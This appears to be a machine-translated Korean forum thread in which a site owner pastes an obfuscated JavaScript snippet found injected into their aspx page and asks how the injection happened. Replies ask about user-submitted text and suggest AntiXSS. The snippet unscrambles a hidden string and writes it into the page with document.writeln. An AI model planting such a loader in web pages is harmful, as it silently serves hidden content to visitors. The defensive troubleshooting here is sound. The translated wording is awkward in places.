오늘 내 사이트가 다운 된 것을 발견했습니다 ... 오류를 끄고 오류를 추적했습니다. 내 aspx 페이지 하단에 몇 가지 코드가 추가 된 것으로 밝혀졌습니다. (아래 코드를 찾으십시오). 분명히 코드가 내 aspx 페이지 didnot 허용하지 않는 일부 HTML 태그를했다 .. 오류가 발생했습니다.코드가 삽입 됨
나는 누군가가 내 aspx 페이지에 코드를 삽입 할 수있는 허점을 가질 수 있는지 확인해야합니다 scenerios 알아?
<html>
<body>
<script>
var a='';
var b='%2/tafod%h2b233 Cstx-ri2%%32d%i e%/i.nci5g%e%%% 30hisen%h2%%r0/ irt-cis232D0e2f %22mcmimt2t2o2CEr%%nrae2%h2r%%a mDAlmu.w2i5mDEe fcpahch%D0%fr2r a33aond02e2a33m ';
var c='5314869720';
for(var i=0;i<16;i++) for(var j=0;j<10;j++) a+=b.charAt((parseInt(c.charAt(j))*16)+i);
document.writeln(unescape(a));
</script>
</body>
</html>
입니다 읽기 시작 할 수있다? 귀하의 방문자가 귀하의 웹 사이트에 텍스트를 삽입하도록 허용합니까? (shoutbox, forum ...) – walther
[AntiXSS] (http://wpl.codeplex.com/) –
@Tim Schmelter - 우리가 사용하는 것입니다. 나는 그것을 좋아한다. – David